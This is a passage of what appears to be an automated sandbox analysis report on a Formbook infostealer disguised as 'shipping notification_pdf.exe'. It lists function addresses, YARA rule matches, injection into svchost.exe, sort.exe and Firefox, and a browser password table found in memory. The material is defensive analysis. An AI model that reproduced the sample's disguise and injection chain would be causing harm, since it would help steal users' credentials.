            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FA3528_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F132D8_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E3F08_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037003E68_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0368739A8_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E02748_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E12ED8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B2C08_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036452A08_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0367516C8_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F1728_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370B16B8_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036301008_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DA1188_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F81CC8_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364B1B08_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037001AA8_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F70E98_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FF0E08_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EF0CC8_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C08_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036407708_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036647508_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363C7C08_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FF7B08_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365C6E08_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F16CC8_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F75718_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036405358_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DD5B08_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037005918_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036314608_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F24468_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FF43F8_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EE4F68_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FFB768_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FAB408_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0367DBF98_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F6BD78_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365FB808_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B3A6C8_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FFA498_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F7A468_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EDAC68_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DDAAC8_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03685AA08_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363EA808_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036569628_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036499508_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B9508_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036429A08_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370A9A68_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036428408_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364A8408_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AD8008_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036438E08_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366E8F08_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036268B88_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B4F408_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03682F288_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03660F308_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FFF098_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364CFE08_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03632FC88_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FFFB18_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641F928_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640E598_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FEE268_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FEEDB8_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03649EB08_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03652E908_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FCE938_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F7D738_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03643D408_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F1D5A8_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364AD008_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363ADE08_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365FDC08_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03658DBF8_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B9C328_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640C008_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03630CF28_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FFCF28_2_036FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E0CB58_2_036E0CB5
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0394739A11_2_0394739A
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0390E3F011_2_0390E3F0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039C03E611_2_039C03E6
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B132D11_2_039B132D
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038ED34C11_2_038ED34C
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BA35211_2_039BA352
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039052A011_2_039052A0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0391B2C011_2_0391B2C0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039A12ED11_2_039A12ED
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039A027411_2_039A0274
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0390B1B011_2_0390B1B0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039C01AA11_2_039C01AA
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B81CC11_2_039B81CC
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0399A11811_2_0399A118
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038F010011_2_038F0100
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039CB16B11_2_039CB16B
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038EF17211_2_038EF172
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0393516C11_2_0393516C
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039070C011_2_039070C0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039AF0CC11_2_039AF0CC
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B70E911_2_039B70E9
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BF0E011_2_039BF0E0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BF7B011_2_039BF7B0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038FC7C011_2_038FC7C0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0392475011_2_03924750
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0390077011_2_03900770
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B16CC11_2_039B16CC
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0391C6E011_2_0391C6E0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039C059111_2_039C0591
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0399D5B011_2_0399D5B0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0390053511_2_03900535
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B757111_2_039B7571
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039AE4F611_2_039AE4F6
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BF43F11_2_039BF43F
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B244611_2_039B2446
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038F146011_2_038F1460
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0391FB8011_2_0391FB80
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B6BD711_2_039B6BD7
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0393DBF911_2_0393DBF9
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BAB4011_2_039BAB40
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BFB7611_2_039BFB76
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038FEA8011_2_038FEA80
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03945AA011_2_03945AA0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0399DAAC11_2_0399DAAC
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039ADAC611_2_039ADAC6
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BFA4911_2_039BFA49
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B7A4611_2_039B7A46
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03973A6C11_2_03973A6C
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039029A011_2_039029A0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039CA9A611_2_039CA9A6
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0390995011_2_03909950
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0391B95011_2_0391B950
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0391696211_2_03916962
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038E68B811_2_038E68B8
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0392E8F011_2_0392E8F0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039038E011_2_039038E0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0396D80011_2_0396D800
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0390284011_2_03902840
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0390A84011_2_0390A840
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03901F9211_2_03901F92
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BFFB111_2_039BFFB1
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038F2FC811_2_038F2FC8
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0390CFE011_2_0390CFE0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BFF0911_2_039BFF09
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03920F3011_2_03920F30
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03942F2811_2_03942F28
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03974F4011_2_03974F40
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03912E9011_2_03912E90
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BCE9311_2_039BCE93
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03909EB011_2_03909EB0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BEEDB11_2_039BEEDB
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BEE2611_2_039BEE26
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03900E5911_2_03900E59
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03918DBF11_2_03918DBF
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0391FDC011_2_0391FDC0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038FADE011_2_038FADE0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0390AD0011_2_0390AD00
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B1D5A11_2_039B1D5A
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03903D4011_2_03903D40
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B7D7311_2_039B7D73
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039A0CB511_2_039A0CB5
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BFCF211_2_039BFCF2
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038F0CF211_2_038F0CF2
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03900C0011_2_03900C00
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03979C3211_2_03979C32
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F8174011_2_02F81740
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7C66011_2_02F7C660
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7C65A11_2_02F7C65A
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F9B47011_2_02F9B470
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7A8F911_2_02F7A8F9
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7C88011_2_02F7C880
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7A90011_2_02F7A900
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F82FE011_2_02F82FE0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F82FDB11_2_02F82FDB
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F84DF011_2_02F84DF0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BE3D411_2_037BE3D4
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BE2B611_2_037BE2B6
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BE76C11_2_037BE76C
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BD7D811_2_037BD7D8
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BCA8811_2_037BCA88
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BE8F211_2_037BE8F2
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_05333D4A12_2_05333D4A
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_05333D4F12_2_05333D4F
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0532D5EF12_2_0532D5EF
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_053324AF12_2_053324AF
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0532B66812_2_0532B668
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0532B66F12_2_0532B66F
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0534C1DF12_2_0534C1DF
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_05335B5F12_2_05335B5F
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0532D3C912_2_0532D3C9
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0532D3CF12_2_0532D3CF
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F3F7D814_2_00000221B5F3F7D8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F403D414_2_00000221B5F403D4
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F4076C14_2_00000221B5F4076C
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F402B614_2_00000221B5F402B6
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F3EA8814_2_00000221B5F3EA88
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F408F214_2_00000221B5F408F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 265 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 89 times
            Source: C:\Windows\SysWOW64\sort.exeCode function: String function: 0397F290 appears 105 times
            Source: C:\Windows\SysWOW64\sort.exeCode function: String function: 038EB970 appears 263 times
            Source: C:\Windows\SysWOW64\sort.exeCode function: String function: 03947E54 appears 89 times
            Source: C:\Windows\SysWOW64\sort.exeCode function: String function: 0396EA12 appears 84 times
            Source: C:\Windows\SysWOW64\sort.exeCode function: String function: 03935130 appears 36 times
            Source: shipping notification_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: AVyNLNHPrma.exe, 0000000C.00000002.3144473243.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614812981.00000000010D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/7
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeFile created: C:\Users\user~1\AppData\Local\Temp\surmountJump to behavior
            Source: shipping notification_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sort.exe, 0000000B.00000002.3137911824.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1802042316.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1801974564.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3137911824.00000000034E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: shipping notification_pdf.exeReversingLabs: Detection: 31%
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeFile read: C:\Users\user\Desktop\shipping notification_pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\shipping notification_pdf.exe "C:\Users\user\Desktop\shipping notification_pdf.exe"
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping notification_pdf.exe"
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeProcess created: C:\Windows\SysWOW64\sort.exe "C:\Windows\SysWOW64\sort.exe"
            Source: C:\Windows\SysWOW64\sort.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping notification_pdf.exe"Jump to behavior
